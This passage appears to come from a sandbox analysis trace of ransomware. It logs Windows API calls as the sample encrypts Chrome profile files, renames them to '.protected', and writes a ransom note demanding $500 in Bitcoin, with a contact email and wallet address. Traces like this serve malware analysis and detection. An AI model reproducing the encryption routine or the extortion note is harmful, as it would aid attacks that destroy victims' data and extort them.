hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.205] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0084.205] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.206] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.206] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.206] CloseHandle (hObject=0x158) returned 1 [0084.206] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected") returned 168 [0084.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.protected")) returned 1 [0084.207] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Windows") returned -1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Program Files") returned -1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="Program Files (x86)") returned -1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="$Recycle.bin") returned 1 [0084.207] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="System Volume Information") returned -1 [0084.207] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.207] StrStrIW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".protected") returned 0x0 [0084.207] lstrcmpW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.207] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".txt") returned 0x0 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".rar") returned 0x0 [0084.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal") returned 166 [0084.208] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal", lpSrch=".zip") returned 0x0 [0084.208] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.208] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0084.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.208] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.209] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.209] CloseHandle (hObject=0x158) returned 1 [0084.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected") returned 176 [0084.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal.protected")) returned 1 [0084.210] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.210] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.210] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\RESTORE_FILES.txt") returned 111 [0084.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.210] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.211] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.211] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.211] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.212] CloseHandle (hObject=0x154) returned 1 [0084.212] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Windows") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Program Files") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="Program Files (x86)") returned -1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="$Recycle.bin") returned 1 [0084.212] lstrcmpiW (lpString1="Login Data", lpString2="System Volume Information") returned -1 [0084.212] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.212] StrStrIW (lpFirst="Login Data", lpSrch=".protected") returned 0x0 [0084.212] lstrcmpW (lpString1="Login Data", lpString2="RESTORE_FILES.txt") returned -1 [0084.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".txt") returned 0x0 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".rar") returned 0x0 [0084.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 90 [0084.213] StrStrW (lpFirst="Login Data", lpSrch=".zip") returned 0x0 [0084.213] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.218] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.218] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.219] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.220] CloseHandle (hObject=0x154) returned 1 [0084.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.protected") returned 100 [0084.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data.protected")) returned 1 [0084.222] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Windows") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Program Files") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Program Files (x86)") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="$Recycle.bin") returned 1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="System Volume Information") returned -1 [0084.222] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.222] StrStrIW (lpFirst="Login Data-journal", lpSrch=".protected") returned 0x0 [0084.222] lstrcmpW (lpString1="Login Data-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.222] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".txt") returned 0x0 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".rar") returned 0x0 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".zip") returned 0x0 [0084.223] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.223] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.223] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.224] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.224] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.225] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.225] CloseHandle (hObject=0x154) returned 1 [0084.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.protected") returned 108 [0084.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal.protected")) returned 1 [0084.226] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Windows") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Program Files") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Program Files (x86)") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="$Recycle.bin") returned 1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="System Volume Information") returned -1 [0084.226] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.226] StrStrIW (lpFirst="Network Action Predictor", lpSrch=".protected") returned 0x0 [0084.227] lstrcmpW (lpString1="Network Action Predictor", lpString2="RESTORE_FILES.txt") returned -1 [0084.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".txt") returned 0x0 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".rar") returned 0x0 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".zip") returned 0x0 [0084.227] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.233] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.233] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.233] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.234] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.234] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.234] CloseHandle (hObject=0x154) returned 1 [0084.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.protected") returned 114 [0084.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor.protected")) returned 1 [0084.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: 